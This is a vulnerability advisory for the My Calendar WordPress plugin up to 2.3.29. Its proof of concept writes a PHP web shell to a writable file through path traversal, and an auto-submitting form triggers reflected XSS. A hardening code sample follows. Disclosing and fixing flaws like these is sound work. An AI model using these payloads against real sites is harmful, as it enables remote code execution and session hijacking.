My Calendar <= 2.3.29 - Arbitrary File Override & Reflected XSS


Description
The file override vulnerability allows an administrator to overwrite any file the web server process can write to, via path traversal in the mc_css_file parameter of the stylesheet editor, ignoring settings such as DISALLOW_FILE_EDIT. A second issue, a reflected XSS, exists in the my-calendar-help page.
Proof of Concept
Arbitrary File Override
-----------------------

POST http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-styles
   Post Data:
      _wpnonce[a_valid_nonce]
      mc_edit_style[true]
      mc_css_file[../../../../../../../var/www/wordpress/wp-content/plugins/some-plugin/some-writable-file.php]
      mc_show_css[]
      style[<?php passthru($_GET['exec']) ?>]
      save[Save+Changes]

GET http://localhost/wordpress/wp-content/plugins/some-plugin/some-writable-file.php?exec=id

Reflected XSS
-------------

<form name="myform"
action="http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-help"
method="POST">
<input name="generator" id="generator" value="1">
<input name="foo" id="foo" value="</textarea><script>alert(1)</script>">
<input type="submit" value="Submit">
</form>
<script>document.myform.submit();</script>
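Added hardening example, not code from the My Calendar plugin: it shows how the mc_css_file value from the first PoC should be constrained before anything is written, and checks DISALLOW_FILE_EDIT. The function names and the styles directory are assumptions; only the parameter names come from the PoC above.

```php
<?php
// Added hardening example, not the plugin's code; names here are assumptions.

// Resolve a user-supplied stylesheet name to a path inside $styles_dir.
// Returns the absolute path, or false when the request must be refused.
function mc_resolve_style_path($styles_dir, $requested) {
    $base = realpath($styles_dir);
    if ($base === false) {
        return false;                       // styles directory does not exist
    }
    // Bare file names only: separators/traversal change basename(); arrays
    // (mc_css_file[]) and NUL bytes are refused as well.
    if (!is_string($requested) || $requested === ''
        || basename($requested) !== $requested
        || strpos($requested, "\0") !== false) {
        return false;
    }
    // Whitelist the character set and force .css: a .php target like the
    // PoC's is impossible whatever the path says.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.css\z/', $requested)) {
        return false;
    }
    $target = $base . DIRECTORY_SEPARATOR . $requested;
    // Defence in depth: the canonical parent of the target must be $base.
    if (realpath(dirname($target)) !== $base) {
        return false;
    }
    return $target;
}

// Honour the WordPress constant the vulnerable code ignored.
function mc_file_edit_allowed() {
    return !(defined('DISALLOW_FILE_EDIT') && DISALLOW_FILE_EDIT);
}

// Save handler sketch; check_admin_referer() exists only inside WordPress.
function mc_save_style($styles_dir, $post) {
    // check_admin_referer('my-calendar-styles');
    if (!mc_file_edit_allowed()) {
        return 'refused: DISALLOW_FILE_EDIT is set';
    }
    $name = isset($post['mc_css_file']) ? $post['mc_css_file'] : '';
    $path = mc_resolve_style_path($styles_dir, $name);
    if ($path === false) {
        return 'refused: invalid stylesheet name';
    }
    file_put_contents($path, (string) $post['style']);
    return 'saved ' . basename($path);
}
```

Called with the PoC's mc_css_file value the resolver returns false, so nothing is written. For the reflected parameter on the help page, output escaping with WordPress's esc_textarea() before echoing into the textarea closes the second issue.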

Affects

Plugin my-calendar
fixed in version 2.3.30

References

URL http://software-talk.org/blog/2015/05/arbitrary-file-override-reflected-xss-my-calendar-wordpress-plugin/

Classification

Type MULTI

Miscellaneous

Submitter Tim Coen
Submitter Website http://software-talk.org/blog
Verified No
WPVDB ID 7990

Timeline

Publicly Published 2015-05-15
Added 2015-05-15
Last Updated 2015-05-15

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.